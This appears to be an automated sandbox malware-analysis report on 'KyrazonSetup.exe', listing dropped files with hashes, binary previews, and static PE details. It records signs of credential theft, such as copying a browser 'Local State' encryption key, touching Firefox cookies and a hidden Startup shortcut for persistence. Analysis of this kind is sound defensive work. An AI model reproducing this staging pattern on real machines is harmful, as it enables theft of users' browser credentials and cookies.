                                                                                    MD5:F16C36AE369609497BFD0847889BEC63
                                                                                    SHA1:5DCA218BF0B2A20D7D027FA10FDB1B8152564FE4
                                                                                    SHA-256:4488A958418227FBE6F64898C2F85EEFD87FC9E46AEA457233B38DB8A86E944D
                                                                                    SHA-512:9F06F4A318C8A3E2FDCCB6D983087184CFF37A2B79E0C1E85B3AC8E45695454C4AACB4468593EBBFFF64739B0D598BA4D1D9DD94187B1BBD82C1369C62781109
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .....h>......... 17.......................................P...........`A.........................................`J.~.....J.P.....P......0N..g........... P..}....J.......................J.(...@.>.@.............J.P............................text....f>......h>................. ..`.rdata..L.....>......l>.............@..@.data...P....pK......PK.............@....pdata...g...0N..h....L.............@..@.00cfg..8.....O......RN.............@..@.gxfg....-....O......TN.............@..@.retplne......O.......N..................tls....Y.....O.......N.............@..._RDATA..\.....P.......N.............@..@.rsrc.........P.......N.............@..@.reloc...}... P..~....N.............@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader_icd.json

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):106
                                                                                    Entropy (8bit):4.724752649036734
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                    MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                    SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                    SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                    SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                    Malicious:false
                                                                                    Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):953856
                                                                                    Entropy (8bit):6.582980857445342
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:xYWOq/4Kt/Ku8n387ecbFb6Z5WoDYsHY6g3P0zAk7so:xY65/M387R56Z5WoDYsHY6g3P0zAk7s
                                                                                    MD5:0A8150E85160EA4311DDBD5B2D1B0B1B
                                                                                    SHA1:A012B8886EC9F305FF4A055CCDDD5FC1F6045869
                                                                                    SHA-256:0D56A41BEAD58FD5FEE44B2EE60485D4C80A3A639ACC42CFC57C8E059078DFE0
                                                                                    SHA-512:D2D853D072AE7AC6871C880F164EEAA6300D9F951DE3AACB4D65195407AA4A1EF18B9BEAE14B7EDA0936E4FCA5FB56B65038370D8E349893F3C8027526415921
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .........................................................0............`A........................................p...<!...3..P............ ...s........... ..L...............................(...@...@............7...............................text.............................. ..`.rdata..............................@..@.data...(M....... ..................@....pdata...s... ...t..................@..@.00cfg..8............J..............@..@.gxfg...P).......*...L..............@..@.retplne.............v...................tls.................x..............@..._RDATA..\............z..............@..@.rsrc................|..............@..@.reloc..L.... ......................@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):9216
                                                                                    Entropy (8bit):5.530278822198483
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:VdkEgnuqkdVMvy7/xcfK4PRef6gQzYet89A2:Vdkbn4VMvy7UKcef6XzHAA2
                                                                                    MD5:4287DBF2AD9E000D8653137470528FB7
                                                                                    SHA1:D488EA09A1C35F9D773195B3CBDBB20E4878C0A4
                                                                                    SHA-256:35A523FE649201442C9FA00D875CF9ACF8CED7C11347726CC0C6DF5B0EDA9F95
                                                                                    SHA-512:E5DAFA93600E9C1E994B4E0131B841B2E14F76D874875926F90F1F1C2CFD9E2CAA374A1F584594F41E4FEB0C06E93115E9FA23237DBC31D3E1C208AD8D0CF58A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../../../..Wy./../../....../..Wi./..Wx./..W~./..W{./..Rich./..................PE..L...V{mW...........!................p!.......0...............................p............@.........................P5..o...$1..P....P.......................`.......................................................0...............................text............................... ..`.rdata.......0......................@..@.data........@......................@....rsrc........P......................@..@.reloc..d....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):95744
                                                                                    Entropy (8bit):6.8710970946240435
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:fn3DhuJJT35gGtLjbMGCDsTF7RqXqOGrgCf46qKn6LJ8Lr7f59aguhrAPfKS:fnNuJJT35gGtjMhDsTF7RqXqf8ZQEwy
                                                                                    MD5:21D805663834F61CB443545B8883FAF2
                                                                                    SHA1:B222C5CA1E4CB8A7BFF7EB7B78D46B8D99BF71E1
                                                                                    SHA-256:C18B46A68436D164C964BA9B208E5C27CCC50E6A5A2DB115E8FB086663B5308F
                                                                                    SHA-512:37836150EF2837F69B82399024D0B93DBDAC992971C7FE7B50959107C0520F5874D45F4230F08554514E3BD6A76D6E35C55C8AFD53F993ABA18F77475EF02001
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@L...-rM.-rM.-rM.U.M.-rM.U.M.-rM.-sMh-rMk2vM.-rM.1|M.-rMP.BM.-rM...M.-rM...M.-rM...M.-rM...M.-rMRich.-rM................PE..L...D..[...........!....."...P...............@......................................dW....@..........................k..d...<b..........X............................................................................@...............................text....!.......".................. ..`.rdata...1...@...2...&..............@..@.data...<............X..............@....rsrc...X............^..............@..@.reloc..:............d..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.825582780706362
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                                                                                    MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                                                                                    SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                                                                                    SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                                                                                    SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\app-64.7z

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:7-zip archive data, version 0.4
                                                                                    Category:dropped
                                                                                    Size (bytes):79732311
                                                                                    Entropy (8bit):7.999995366647166
                                                                                    Encrypted:true
                                                                                    SSDEEP:1572864:V+BWqL9BHWFoNfUwbzu3YkHCtGD/v0778GxZE/vXJU7cg33NqRcw9fDE:8B1mEcwbWaGD/c7uP+9NqRhi
                                                                                    MD5:F4BA303BBD2991FEF3CB62103E07A8BA
                                                                                    SHA1:478A890EE26FF752134FE61881E8AC3D65BEABEA
                                                                                    SHA-256:04C7E564C1AAEBDCFA827E9B90C7B26ACFACB6CDDF8EAA2DAB4FF770AA7D166F
                                                                                    SHA-512:5E838B318CFA75572DF8747EEA778601D2A7424B5B8E91CD0DD9CDD2244572AF4C257A17D6341610803BE5A6FF9667530572DE90AADFD3C70FBCCD78FBD51D93
                                                                                    Malicious:false
                                                                                    Preview:7z..'...T2..........%........)......]...6...-g../B.&.....M.yC.._.MF........].(.vF.7...E....7.[;.R.a......7...M...;{.....P...+..Dh.:m...L=F.`Z...el.X.DX.....L..pN...>.A.|1.p.!PE..7.T\.F!....%.".....;..z|x.%r.....6.j..m......S.H\..f2.=......7..s..c...........q..um...G....%[e./^U.y..........{.o+.K.....I.4..0..j0..0<......B.2|......(.E...{..R.,.@..2.u.f..Z..+:...`.lA...;`....<....7.0kT. L._l.~>...Z"....~.B"......1~s.'9%...5U.V&~...^........c...]Lm.....C<....z..riF..>...<.6^.pRu.6.fc .ZI...R:`..@y{..i6...5.iRm.:.T....U.JN.....#.UJ.;d...x3..c>. ..n..}G.7.[.M.1...fTiV...I..a>......I......g..Q...@{..@z.s....3.Y...C}F+;...y..5..R......k;D....+4....d.-.....LQ..j.K.%..f.)....u.$..1I.4..J...Z:..Q_....C.{.k.|.'...x..tW.......3..].;..E.[a.;.1.z".X._..a.iT7}....^..z'R..o....E..{C.o...p.P...2%.b.....cWV.d<UqL?.mz..1....@...t.@....5.f....8.$..XH...SE.]...O.8tV..g.(.M.t.(B\...<...fZ...^w*0.<...n.++.Y....C.->.......0,0.m.w..dX....e..M..Qx.B.7.s.....H.y?lU.._...

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6656
                                                                                    Entropy (8bit):4.997724806443559
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:17GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNT3e:5XhHR0aTQN4gRHdMqJVgNa
                                                                                    MD5:50BA20CAD29399E2DB9FA75A1324BD1D
                                                                                    SHA1:3850634BB15A112623222972EF554C8D1ECA16F4
                                                                                    SHA-256:E7B145ABC7C519E6BD91DC06B7B83D1E73735AC1AC37D30A7889840A6EED38FC
                                                                                    SHA-512:893E053FCB0A2D3742E2B13B869941A3A485B2BDA3A92567F84190CB1BE170B67D20CC71C6A2CB92F4202140C8AFD9C40A358496947D709E0C4B68D43A368754
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....~.\...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):446464
                                                                                    Entropy (8bit):6.5897298243131495
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:VQ+kwWa/1NfQWLv6rGnrpJJ7OELbg8reLy2dbJUa4xk+N9/2itUirbeaY:VvW0tLBp1cIeOwJL4xT/F5bY
                                                                                    MD5:D7778720208A94E2049972FB7A1E0637
                                                                                    SHA1:080D607B10F93C839EC3F07FAEC3548BB78AC4DC
                                                                                    SHA-256:98F425F30E42E85F57E039356E30D929E878FDB551E67ABFB9F71C31EEB5D44E
                                                                                    SHA-512:98493EA271738ED6BA3A02DE774DEEF267BFA3C16F3736F1A1A3856B9FECC07F0EA8670827E7EB4ED05C907E96425A0C762E7010CB55A09302CA3CFB3FE44B2B
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......L]7a.<Y2.<Y2.<Y2mZZ3.<Y2mZ\3.<Y2ZT\3+<Y2ZT]3.<Y2ZTZ3.<Y2mZ]3.<Y2mZX3.<Y2.<X2.<Y2.U]3#<Y2.U\3.<Y2.UY3.<Y2.U.2.<Y2.<.2.<Y2.U[3.<Y2Rich.<Y2........................PE..L.....\...........!.....2...........,.......P...............................p............@..........................n.......o..d............................ ...H..................................0...@............P..@............................text....1.......2.................. ..`.rdata..\+...P...,...6..............@..@.data...p........ ...b..............@....rsrc...............................@..@.reloc...H... ...J..................@..B........................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Roaming\KyrazonGodot\Local State (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):434
                                                                                    Entropy (8bit):5.649898489247305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YKWSCuj9rrt+pumEikJ6cL7nsUIk5jU85BGXs:YKWJu5rrtksIm7fjjb+s
                                                                                    MD5:CED907CF89C78828D6160FA4A47963D7
                                                                                    SHA1:5D826F5F6FD083DE2A861107C1EC1B1602FA2F39
                                                                                    SHA-256:6E46E34F97D81F4DBB0577355BB8A583C1CD05361F488C4AD36D05E44B0A97AC
                                                                                    SHA-512:3EA200D510A58074445650589F97D1EE36E2DE0CBA03486C744FFF93D50E559B66EBE363A09BBD8E04FFF528A36FB749ECCE97B9F5FF988751FEA2E2787C33D8
                                                                                    Malicious:false
                                                                                    Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACu3ryiKftaQoCbKjKZwaN7EAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACFYJyJsaTd/TiLYYHdYik8+dZHtqYYPQ6/U/cquvMm8gAAAAAOgAAAAAIAACAAAADM2kbgovSC+szMLJN20Pn5/WL6wttWyybd7HOwndS0pzAAAACWVYvS2KAsW7st5vP/gcPeSeKnVzUrEzPCCtEaMilE7VdLaYvle7EuDmvPERBVcddAAAAAO5f+b7kX6omxu5i0hAgCroNWn+zQdAhqc1ZKPTA5CWpQJ6TP0SYnseZOxO0ue5JQkklFlL9duKptdHcWrj5UDQ=="}}

                                                                                    C:\Users\user\AppData\Roaming\KyrazonGodot\d08cf831-bf1f-489a-9c55-6184850d02dd.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):434
                                                                                    Entropy (8bit):5.649898489247305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YKWSCuj9rrt+pumEikJ6cL7nsUIk5jU85BGXs:YKWJu5rrtksIm7fjjb+s
                                                                                    MD5:CED907CF89C78828D6160FA4A47963D7
                                                                                    SHA1:5D826F5F6FD083DE2A861107C1EC1B1602FA2F39
                                                                                    SHA-256:6E46E34F97D81F4DBB0577355BB8A583C1CD05361F488C4AD36D05E44B0A97AC
                                                                                    SHA-512:3EA200D510A58074445650589F97D1EE36E2DE0CBA03486C744FFF93D50E559B66EBE363A09BBD8E04FFF528A36FB749ECCE97B9F5FF988751FEA2E2787C33D8
                                                                                    Malicious:false
                                                                                    Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACu3ryiKftaQoCbKjKZwaN7EAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAACFYJyJsaTd/TiLYYHdYik8+dZHtqYYPQ6/U/cquvMm8gAAAAAOgAAAAAIAACAAAADM2kbgovSC+szMLJN20Pn5/WL6wttWyybd7HOwndS0pzAAAACWVYvS2KAsW7st5vP/gcPeSeKnVzUrEzPCCtEaMilE7VdLaYvle7EuDmvPERBVcddAAAAAO5f+b7kX6omxu5i0hAgCroNWn+zQdAhqc1ZKPTA5CWpQJ6TP0SYnseZOxO0ue5JQkklFlL9duKptdHcWrj5UDQ=="}}

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 6 20:54:17 2024, mtime=Tue Aug 6 20:54:26 2024, atime=Sun Jun 30 16:55:04 2024, length=172671488, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.979723564397633
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8cpOqpBuRcJtbBHIjKJKAfAnH5fTHGcmA/MNkIqyFm:8yOYBuRcJtbBHAQKAonBrGcmAikRyF
                                                                                    MD5:AC87BCD992D96F8747862D8F0C24A074
                                                                                    SHA1:74995DA378EEF2938A8A8AF68CA3BB8E09D8173F
                                                                                    SHA-256:42A445095A23EA06928060D64442496A7E696113C8771CE7E44F6205A017AAE2
                                                                                    SHA-512:C4AC49AC7515F207CCED9398B794E151C56D606823ED0AD660E22DBF18DC5CE574B9CFAA92DC6BC4A360E3F7F715B2D38A54043BC8F1BF546ACF4178FEA4D95C
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... .....)/K...Y..4K.....~.r.....J.....................8.:..DG..Yr?.D..U..k0.&...&......vk.v....1i. K...o..5K.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y...Local.<......CW.^.Y.....b......................di.L.o.c.a.l.....Z.1......Y....Programs..B.......Y...Y................................P.r.o.g.r.a.m.s.....b.1......Y...KYRAZO~1..J.......Y...Y.....S.....................e.X.K.y.r.a.z.o.n.G.o.d.o.t.....n.2...J..X. .KYRAZO~1.EXE..R.......Y..Y......C........................K.y.r.a.z.o.n.G.o.d.o.t...e.x.e.......r...............-.......q...........7........C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe..>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.K.y.r.a.z.o.n.G.o.d.o.t.\.K.y.r.a.z.o.n.G.o.d.o.t...e.x.e.........|....I.J.H..K..:...`.......X.......580913...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b

                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):32768
                                                                                    Entropy (8bit):0.017262956703125623
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                    Malicious:false
                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.9999896835153494
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:KyrazonSetup.exe
                                                                                    File size:80'239'576 bytes
                                                                                    MD5:7a84bbeade50e7110fe8d278dc22b92d
                                                                                    SHA1:9624dde2043059402cc1f729684ecc2f9a424eef
                                                                                    SHA256:c765f61cee33c326acc4ea19256267c35129a1ec7edb567fe0b5ed9a88e3d6b1
                                                                                    SHA512:b5ca02ca5e7c493a400214bb573b8d26da4129edec880e807ca198dbfab5b1bb70cae00e63eacc4c2f17b175194e0af353eda500442788a0ada82e019b78095d
                                                                                    SSDEEP:1572864:F+BWqL9BHWFoNfUwbzu3YkHCtGD/v0778GxZE/vXJU7cg33NqRcw9fDv:MB1mEcwbWaGD/c7uP+9NqRhV
                                                                                    TLSH:830833B777A9946DD2017B7B248379A0027E70DB4314B67F4F0D31AC48AAD667C2EB60
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L......\.................d....... .

                                                                                    File Icon

                                                                                    Icon Hash:adaeb397f36b6331

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40320c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5C157F8F [Sat Dec 15 22:26:23 2018 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:3abe302b6d9a1256e6a915429af4ffd2

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000184h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A198h
                                                                                    mov dword ptr [esp+20h], ebx
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [004080A0h]
                                                                                    call dword ptr [0040809Ch]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [0045240Ch], eax
                                                                                    je 00007F0D806E1F33h
                                                                                    push ebx
                                                                                    call 00007F0D806E500Ah
                                                                                    cmp eax, ebx
                                                                                    je 00007F0D806E1F29h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 00408298h
                                                                                    push esi
                                                                                    call 00007F0D806E4F86h
                                                                                    push esi
                                                                                    call dword ptr [00408098h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], bl
                                                                                    jne 00007F0D806E1F0Dh
                                                                                    push 0000000Ah
                                                                                    call 00007F0D806E4FDEh
                                                                                    push 00000008h
                                                                                    call 00007F0D806E4FD7h
                                                                                    push 00000006h
                                                                                    mov dword ptr [00452404h], eax
                                                                                    call 00007F0D806E4FCBh
                                                                                    cmp eax, ebx
                                                                                    je 00007F0D806E1F31h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007F0D806E1F29h
                                                                                    or byte ptr [0045240Fh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408044h]
                                                                                    push ebx
                                                                                    call dword ptr [00408288h]
                                                                                    mov dword ptr [004524D8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+38h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 00434030h
                                                                                    call dword ptr [00408178h]
                                                                                    push 0040A188h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe50000x9bc0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x628f0x6400547c212779a9000b5c1f9c5c5e58bb70False0.6705859375data6.431188612581397IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x135c0x1400b27ba0846d4bbf5bff764f5a5c418a97False0.4611328125data5.240043476337556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x485180x600aa19af09b29590d8b5ccead2c77eb317False0.4537760416666667data4.044766712062166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x530000x920000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xe50000x9bc00x9c004e0ddf2bb9608e024e5129c4f8b69cb6False0.9537760416666666data7.829966589485731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xe51d80x8f8dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9947209447876133
                                                                                    RT_DIALOG0xee1680x202dataEnglishUnited States0.4085603112840467
                                                                                    RT_DIALOG0xee3700xf8dataEnglishUnited States0.6290322580645161
                                                                                    RT_DIALOG0xee4680xeedataEnglishUnited States0.6260504201680672
                                                                                    RT_GROUP_ICON0xee5580x14dataEnglishUnited States1.05
                                                                                    RT_VERSION0xee5700x228dataEnglishUnited States0.4945652173913043
                                                                                    RT_MANIFEST0xee7980x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                    Imports

                                                                                    DLLImport
